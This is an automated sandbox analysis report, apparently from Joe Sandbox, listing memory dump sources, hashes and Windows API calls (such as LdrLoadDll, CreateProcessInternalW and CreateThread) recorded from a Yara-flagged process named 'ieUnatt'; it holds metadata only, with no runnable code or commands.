                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 605669eba983c99381090a91a5477ea94584132db87623fcfb553b02d6948d81
                                                                                                              • Instruction ID: 82cee819c56b28206e33c59070778754fbdb3d55e0a11572bc3a5931835e6ab2
                                                                                                              • Opcode Fuzzy Hash: 605669eba983c99381090a91a5477ea94584132db87623fcfb553b02d6948d81
                                                                                                              • Instruction Fuzzy Hash: C0900275601510426180715848054066015ABE1305395D115A0A55560C8619D9569269
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 1d9923ed5b7cd449b486cbb7c9c2d15fde1e9c73601b53a6cde007e472efb0df
                                                                                                              • Instruction ID: da75f6ac95c548582574887c504dfff0ccd8c3d8416783779a69cda653a35aba
                                                                                                              • Opcode Fuzzy Hash: 1d9923ed5b7cd449b486cbb7c9c2d15fde1e9c73601b53a6cde007e472efb0df
                                                                                                              • Instruction Fuzzy Hash: 6690023560581012B180715848855464015ABE0305B55D011E0925554C8A15DA575361
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 71324957fe8480a7d53b06fc26188f60d86833495815d18a478c92622f3feaf8
                                                                                                              • Instruction ID: 8752732d6e658c84820b68c6fcdcf8b8e9a642be3497f705adada919a16a2b49
                                                                                                              • Opcode Fuzzy Hash: 71324957fe8480a7d53b06fc26188f60d86833495815d18a478c92622f3feaf8
                                                                                                              • Instruction Fuzzy Hash: FE90023520141402F1407598540964600159BE0305F55E011A5525555EC666D9926131
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 7654d483e40f9b0af42da82d064bda920c62cdc2fcc8485a904c325d4a276868
                                                                                                              • Instruction ID: efec793081fe948692ceb8b6d48a6b9dc200a9f5e08ac01e0b68837881964346
                                                                                                              • Opcode Fuzzy Hash: 7654d483e40f9b0af42da82d064bda920c62cdc2fcc8485a904c325d4a276868
                                                                                                              • Instruction Fuzzy Hash: 0F90023520141842F14071584405B4600159BE0305F55D016A0625654D8616D9527521
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 0ef2622ce1ccfdb30a23b0ef4280a0ed3ef4a38a58a512d1b13fba10ddb4b48b
                                                                                                              • Instruction ID: 23afcf75f13b066b083ad3d1d68dd16e57bfe3b3ed743730f363c88c044c813f
                                                                                                              • Opcode Fuzzy Hash: 0ef2622ce1ccfdb30a23b0ef4280a0ed3ef4a38a58a512d1b13fba10ddb4b48b
                                                                                                              • Instruction Fuzzy Hash: 3C90023520149802F1507158840574A00159BD0305F59D411A4925658D8696D9927121
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: e5379dfbd7455ef7da8707574de66c9d698f605acd769a38c948be9c8d18ac1e
                                                                                                              • Instruction ID: 46b5aed7b593715fbc9c661383c5d09c003509126c0e0609e3c968f092a0ed08
                                                                                                              • Opcode Fuzzy Hash: e5379dfbd7455ef7da8707574de66c9d698f605acd769a38c948be9c8d18ac1e
                                                                                                              • Instruction Fuzzy Hash: A490023520141413F1517158450570700199BD0245F95D412A0925558D9657DA53A121
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 73b3d7bed2c23510dd3b86415e345ff5524c8f5bb464667c26ba246c6487b7ad
                                                                                                              • Instruction ID: 5d71bcb8ed49509d46d6ee3cd0b6060edeab9a6d6ad9e7c8433a783b4a4b55ea
                                                                                                              • Opcode Fuzzy Hash: 73b3d7bed2c23510dd3b86415e345ff5524c8f5bb464667c26ba246c6487b7ad
                                                                                                              • Instruction Fuzzy Hash: 8B900235242451527585B15844055074016ABE0245795D012A1915950C8527E957D621
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 69ddd2a4c9b1488c6089753dcd7b9d2d34027db167b5d1a7aa15e7d25b42cb47
                                                                                                              • Instruction ID: 32b868e72a5d6827b2cc80d5c41edc5a95f1f37b82475ef4a1f75181fca959e4
                                                                                                              • Opcode Fuzzy Hash: 69ddd2a4c9b1488c6089753dcd7b9d2d34027db167b5d1a7aa15e7d25b42cb47
                                                                                                              • Instruction Fuzzy Hash: 8190023530141003F180715854196064015EBE1305F55E011E0915554CD916D9575222
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: cba4b48795d235b81b00f34ff92d6b11fafbc83b49c30ebfdad7b54a00dbbe33
                                                                                                              • Instruction ID: 6b992b29a5dc136d6aec902120d291b51fea7920bcdad27d8baaf2aea8aea410
                                                                                                              • Opcode Fuzzy Hash: cba4b48795d235b81b00f34ff92d6b11fafbc83b49c30ebfdad7b54a00dbbe33
                                                                                                              • Instruction Fuzzy Hash: 2E90023D21341002F1C07158540960A00159BD1206F95E415A0516558CC916D96A5321
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 5f487f5a3297f313b5850665135ea5f8b112e121296bcb17a0537eb2550659d7
                                                                                                              • Instruction ID: e2cd9678f0a7165ba6a1be50afb30b4b693714d35d39eb4e2537e2985cfb73bf
                                                                                                              • Opcode Fuzzy Hash: 5f487f5a3297f313b5850665135ea5f8b112e121296bcb17a0537eb2550659d7
                                                                                                              • Instruction Fuzzy Hash: 3790027520181403F1807558480560700159BD0306F55D011A2565555E8A2ADD526135
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 819f0004e95451ccea462e85bacddb3e511ad3e515bfd5710d1fbd2e8187257f
                                                                                                              • Instruction ID: 38022f76c5e945cfd0a921e955c3537bda61fc3d701afa090390abb44751b0a8
                                                                                                              • Opcode Fuzzy Hash: 819f0004e95451ccea462e85bacddb3e511ad3e515bfd5710d1fbd2e8187257f
                                                                                                              • Instruction Fuzzy Hash: 7090023560141502F14171584405616001A9BD0245F95D022A1525555ECA26DA93A131
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 7ceb3e8d3a5fc9fe1cae8f98e6c491b0f7805983a88e0c95262dba6df76de6b2
                                                                                                              • Instruction ID: 24d93346bd90f8fff0e6d4a713c5d398ea3ebc41eb05e63cb42890538aa5a12b
                                                                                                              • Opcode Fuzzy Hash: 7ceb3e8d3a5fc9fe1cae8f98e6c491b0f7805983a88e0c95262dba6df76de6b2
                                                                                                              • Instruction Fuzzy Hash: 72900235211C1042F24075684C15B0700159BD0307F55D115A0655554CC916D9625521
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
• Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
• Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
• Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
• Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
• Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
• Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
• Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
• Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4014339026.0000000004E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E50000, based on PE: true
• Associated: 00000008.00000002.4014339026.0000000004F79000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4014339026.0000000004F7D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4014339026.0000000004FEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_4e50000_ieUnatt.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              APIs
                                                                                                              • Sleep.KERNELBASE(000007D0), ref: 02D941BB
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Sleep
                                                                                                              • String ID: net.dll$wininet.dll
                                                                                                              • API String ID: 3472027048-1269752229
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: InitializeUninitialize
                                                                                                              • String ID: @J7<
                                                                                                              • API String ID: 3442037557-2016760708
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: InitializeUninitialize
                                                                                                              • String ID: @J7<
                                                                                                              • API String ID: 3442037557-2016760708
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02D84C42
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID:
                                                                                                              • API String ID: 2234796835-0
                                                                                                              APIs
                                                                                                              • SetErrorMode.KERNELBASE(00008003,?,?,02D823B0,02D9860F,02D95CCF,02D82380), ref: 02D887F3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorMode
                                                                                                              • String ID:
                                                                                                              • API String ID: 2340568224-0
                                                                                                              APIs
                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02D84C42
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Load
                                                                                                              • String ID:
                                                                                                              • API String ID: 2234796835-0
                                                                                                              APIs
                                                                                                              • CreateProcessInternalW.KERNELBASE(?,?,B416F980,?,02D8898E,00000010,?,?,?,00000044,?,00000010,02D8898E,?,B416F980,?), ref: 02D99F43
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateInternalProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 2186235152-0
                                                                                                              APIs
                                                                                                              • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 02D889FC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AttributesFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 3188754299-0
                                                                                                              APIs
                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02D79F45
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 2422867632-0
                                                                                                              APIs
                                                                                                              • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 02D889FC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AttributesFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 3188754299-0
                                                                                                              APIs
                                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,D08CFFD5,00000007,00000000,00000004,00000000,02D84434,000000F4), ref: 02D99E8C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FreeHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 3298025750-0
                                                                                                              APIs
                                                                                                              • RtlAllocateHeap.NTDLL(02D820B9,?,02D95E8F,02D820B9,02D95CCF,02D95E8F,?,02D820B9,02D95CCF,00001000,?,?,00000000), ref: 02D99E3C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.4011693389.0000000002D70000.00000040.80000000.00040000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_2d70000_ieUnatt.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AllocateHeap
                                                                                                              • String ID:
                                                                                                              • API String ID: 1279760036-0
                                                                                                              APIs
